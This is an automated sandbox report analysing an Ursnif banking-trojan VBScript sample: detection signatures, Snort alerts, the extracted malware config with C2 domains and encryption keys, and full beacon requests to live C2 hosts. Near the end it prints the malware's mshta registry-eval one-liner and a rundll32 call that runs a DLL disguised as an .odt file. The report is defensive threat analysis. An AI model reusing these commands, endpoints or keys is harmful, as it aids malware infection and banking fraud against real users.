Windows Analysis Report v8MaHZpVOY2L.vbs

Overview

General Information

Sample Name: v8MaHZpVOY2L.vbs
Analysis ID: 458149
MD5: 5d6eee678e2f66bef8885b3b3064db81
SHA1: 4f64fdc2929e29ad8c001a0c3d8ad02f175f68d8
SHA256: 9889b06c39eab474b06205ab27007447ee6e7eebdb8ac2e55b31eaacdcde8a49
Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Hooks registry keys query functions (used to hide registry keys)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://gtr.antoinfer.com/rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K Avira URL Cloud: Label: malware
Source: http://app.flashgameo.at/G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000001C.00000003.600911240.0000000004280000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "9LNhwxYlD34jdxVCbRuhkLxCR5ltHK+f92WD9cMttCYYbvrL4wv6YJiUl9MHov+IIcYUbYs1JFt6ciXd5FdaoSi3eR2WJz3cKGQV77NysByS4hxLa5EsHQS3R7uDA4zT8rf/1GgZx5Tp5bLYUv+OvwzR6K0bcxr8BVKOhWasMt87tt2F/oc67dLXbG6cOVSb9XDEKm1AD4WNvDG5s+8oRXKyXYNyBvqnTooYX8iM4Wq8R9SXbFoTevuBBwCGXRu7hbWXoRZP6gXfoUqzaH99rq2BGpO8MD8zNQdBO2RxQLO9iayjRA/+oZ0IQHzkfaTa+mDCPgDQii50gVawYZtAvTBYJQQyRdCtVbewt3iRduY=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "eTV3coItEryBMTIK", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "3"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 12%
Source: app.flashgameo.at Virustotal: Detection: 11%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\beneficial.odt ReversingLabs: Detection: 35%
Multi AV Scanner detection for submitted file
Source: v8MaHZpVOY2L.vbs Virustotal: Detection: 34%
Source: v8MaHZpVOY2L.vbs ReversingLabs: Detection: 13%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04444CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 28_2_04444CEA
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdbXP@L source: powershell.exe, 00000025.00000002.750257715.000001D6861CE000.00000004.00000001.sdmp
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000027.00000002.731260483.0000015F83160000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdb8 source: powershell.exe, 00000025.00000002.750151124.000001D68618E000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdb source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp
Source: Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: wscript.exe, 00000002.00000003.406245520.00000294B943D000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.736255174.0000000070329000.00000002.00020000.sdmp, beneficial.odt.2.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdbXP@L source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49744 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49745 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49745 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49746 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49746 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49747 -> 185.228.233.17:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITOS-ASRU ITOS-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /_2FPQI_2BhXbN/xv2lU8Kt/H_2BdMo7RP11B49_2B_2F0p/qZonO_2BsX/r_2FXf13KB9QuPtJ8/fzPhqB_2BKd8/L6vOPdmyzVt/cOhxQgVRfJCJOJ/2LqjFunTc58GKXt_2Fach/MI8acKZfKve2lDEv/O3RXxaeZ1jmnB_2/BM9wKTm5ezPhIbAkjC/N5BuSzoVY/tbmUpCJD8R6uccF9y9i6/TVII1EazLMdbmsastBa/0EuLYCoDqjXXpV7R0KscZQ/pLkoykG5NbmPg/94pI1TlM/k2tyuNpa_2FFDzXBR3wx_2B/y8INZfX1Fd/ksZUQaKi9Q7CR7rUB/b0tO0OTt2nw2/3iZt0Tq5yV/igZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /kOsDeCoa3YCbt/7unBBLww/wK2a4bs_2FEI4QMN91PzB77/bz4N4g_2FJ/HycIy3_2F8zj3jBC0/8_2FW3BGV1mS/XPDK9f9Rzez/BpS5UyR9Bg2zMd/a_2FnA03_2FZhf2fI92gT/6Pq3nEyBr7Wl1SSB/zAmSQjqWqXfIY_2/Byf0kTcmXemOm2EfN6/CRY7WM32g/emO80EseOb_2BSjCXMeG/FctE3VztzFEWZR0a5bZ/yCEZcBPGdi592UoFqj3gHf/9Ntn0rghQ_2Bu/Ix9av6MS/M_2FOYWbdmDkx6Xj7Ngd9FO/n_2Fp4ojwk/l2YrsEsA6NU73tN6Q/Nzovizi1/wIzBsN1hETht/VNa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: POST /x7RHILsUu13RNWdAgcyIG/qtXPZ5mShxWyId8A/aqzFvUR1vpmX8Up/q_2B2EdTfKMNCz0qxF/_2FPDHq0L/LUAKCoi5Kv4k92FCS9c4/5pNcQF7C6KYMZBsUSDt/KFidT5iQrYQJ8LRP_2FoLY/f_2B88YT7woyk/KKJVXmPv/vF_2FE_2Fvc1X20QJ8r0Wn_/2BzNsjc_2F/YMdyw7a8HJLKOf2JR/adM5VRnv5AOV/eVROMbVITYu/4QdgxMF4kpaBK6/UL3JxZ6B_2FLQEdWMX_2B/oDqnX_2BCDatYw9I/KVGr3LtJ92s34dn/eT_2Bba67PTBBLkoO/1xww0J HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: GET /rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /_2FPQI_2BhXbN/xv2lU8Kt/H_2BdMo7RP11B49_2B_2F0p/qZonO_2BsX/r_2FXf13KB9QuPtJ8/fzPhqB_2BKd8/L6vOPdmyzVt/cOhxQgVRfJCJOJ/2LqjFunTc58GKXt_2Fach/MI8acKZfKve2lDEv/O3RXxaeZ1jmnB_2/BM9wKTm5ezPhIbAkjC/N5BuSzoVY/tbmUpCJD8R6uccF9y9i6/TVII1EazLMdbmsastBa/0EuLYCoDqjXXpV7R0KscZQ/pLkoykG5NbmPg/94pI1TlM/k2tyuNpa_2FFDzXBR3wx_2B/y8INZfX1Fd/ksZUQaKi9Q7CR7rUB/b0tO0OTt2nw2/3iZt0Tq5yV/igZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /kOsDeCoa3YCbt/7unBBLww/wK2a4bs_2FEI4QMN91PzB77/bz4N4g_2FJ/HycIy3_2F8zj3jBC0/8_2FW3BGV1mS/XPDK9f9Rzez/BpS5UyR9Bg2zMd/a_2FnA03_2FZhf2fI92gT/6Pq3nEyBr7Wl1SSB/zAmSQjqWqXfIY_2/Byf0kTcmXemOm2EfN6/CRY7WM32g/emO80EseOb_2BSjCXMeG/FctE3VztzFEWZR0a5bZ/yCEZcBPGdi592UoFqj3gHf/9Ntn0rghQ_2Bu/Ix9av6MS/M_2FOYWbdmDkx6Xj7Ngd9FO/n_2Fp4ojwk/l2YrsEsA6NU73tN6Q/Nzovizi1/wIzBsN1hETht/VNa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: unknown HTTP traffic detected: POST /x7RHILsUu13RNWdAgcyIG/qtXPZ5mShxWyId8A/aqzFvUR1vpmX8Up/q_2B2EdTfKMNCz0qxF/_2FPDHq0L/LUAKCoi5Kv4k92FCS9c4/5pNcQF7C6KYMZBsUSDt/KFidT5iQrYQJ8LRP_2FoLY/f_2B88YT7woyk/KKJVXmPv/vF_2FE_2Fvc1X20QJ8r0Wn_/2BzNsjc_2F/YMdyw7a8HJLKOf2JR/adM5VRnv5AOV/eVROMbVITYu/4QdgxMF4kpaBK6/UL3JxZ6B_2FLQEdWMX_2B/oDqnX_2BCDatYw9I/KVGr3LtJ92s34dn/eT_2Bba67PTBBLkoO/1xww0J HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000025.00000002.732660461.000001D681EC1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04444CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 28_2_04444CEA

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E192C NtMapViewOfSection, 28_2_702E192C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E1E74 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 28_2_702E1E74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E12CE NtCreateSection,memset, 28_2_702E12CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E2495 NtQueryVirtualMemory, 28_2_702E2495
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_044425E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 28_2_044425E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04448055 NtQueryVirtualMemory, 28_2_04448055
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E2274 28_2_702E2274
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04447E30 28_2_04447E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04446680 28_2_04446680
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_0444175B 28_2_0444175B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_70322400 28_2_70322400
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_7030A1AC 28_2_7030A1AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_703263D0 28_2_703263D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_703055C0 28_2_703055C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_703047E0 28_2_703047E0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 702FA3B0 appears 34 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: v8MaHZpVOY2L.vbs Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine Classification label: mal100.troj.evad.winVBS@14/8@6/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04446244 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 28_2_04446244
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210802
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Source: v8MaHZpVOY2L.vbs Virustotal: Detection: 34%
Source: v8MaHZpVOY2L.vbs ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
